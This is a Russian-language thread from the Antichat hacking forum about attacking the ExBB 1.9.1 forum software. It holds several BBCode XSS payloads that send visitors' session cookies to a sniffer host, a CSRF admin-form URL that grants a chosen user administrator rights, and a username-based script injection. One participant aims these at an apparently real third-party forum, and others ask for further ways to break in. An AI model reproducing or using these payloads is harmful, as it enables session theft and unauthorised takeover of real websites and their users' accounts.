Форум АНТИЧАТ - Xss в exbb 1.9.1

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Xss в exbb 1.9.1 (https://forum.antichat.xyz/showthread.php?t=2983)

Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg

XSS в каждом теге
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[color='z=]'style='background:url(javasc ript:document.images[0].src="http://localhost/1.php?"+document.cookie)'[/color]
[size='z="]"style='background:url(javascript:docum ent.images[0].src="http://localhost/1.php?"+document.cookie)'[/size]
[url]'z="style='background:url(javascript:document .images[0].src=/http:@@localhost@1.php?/.source.replace(/@/g,String.fromCharCode(47))+document.cookie)'[/url]
[url="]"style='background:url(javascript:document. images[0].src="http://localhost/1.php?"+document.cookie)'[/url]
[img]http://"z='[/img]'style='background:url(javascript:document.ima ges[0].src="http://localhost/1.php?"+document.cookie)'
[img]"onerror="document.images[0].src='http://localhost/1.php'+String.fromCharCode(63)+document.cookie[/img][/QUOTE]<span id='postcolor'>

кроме xss есть еще одна бага
форма редактирования пользователей из админки передается методом GET
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://localhost/exbb/setmembers.php?action=edit_user&checkaction=ye s&userid=3&membertitle=&emailaddress=l ol@lol.ru&newname=lol&password=&homepa ge=&aolname=&icqnumber=&location=& interests=&signature=&numberofposts=0& avatar=noavatar.gif&membercode=ad&submit=% CE%F2%EF%F0%E0%E2%E8%F2%FC[/QUOTE]<span id='postcolor'>
userid=3 - id пользователя для поднятия прав
newname=ваше имя

http://video.antichat.ru/videos/zfailure/exbb_191.rar

Всё хорошо, но это не то. Мне нужна возможность залития файлов на сервер через админку или другой любой способ. А XBB стандартно - ">

ну извени!
там на столько бедная админка, что хрен там было!  http://forum.antichat.ru/iB_html/non...s/confused.gif

zFailure
Не мог бы сказать этот баг уже прикрыли?
а то отсылаю вот этот код

Код:

[size='z="]"style='background:url(javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?video___"+document.cookie)'[/size]

[size='z="]"style='background:url(javascript:document.images[0].src="http://forum.k*****h.com/setmembers.php?action=edit_user&checkaction=yes&userid=45&membertitle=&emailaddress=666z@list.ru&newname=Коля&password=111111&homepage=&aolname=&icqnumber=&location=&interests=&signature=&numberofposts=0&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC")'[/size]

а там тишина и пустота

кто нить может ответить на вопрос есть лиш ещё какие нить баги или дырки или хоть какие нить ещё зацепки на взлом форума Powered by ExBB 1.9.1 или все он стал самым надежным и без бажным форумоммМММ!!!!!

У нас видео есть про этот форум

Кликнул по ссылке

Кста во я тут кое-что заметил по поводу ExBB 1.9.1. В просмотре топа мона добавлять имя юзера кликнув по линку

Код:

<a href="javascript:pasteN<a href="javascript:pasteN('UserName')"><b>UserName</b></a>

, мона зарегистрировать например такой ник

Код:

');alert(document.cookie+'

и при клике будет алерт с куками, несмотря на то, что ' заменяются на & #39; дык вот чуствую это как-то мона обыграть, но пока не знаю как :(

Цитата:

Сообщение от Егорыч+++

У нас видео есть про этот форум

дайте пожайлуста видео!!!! чем больше тем лутше!!!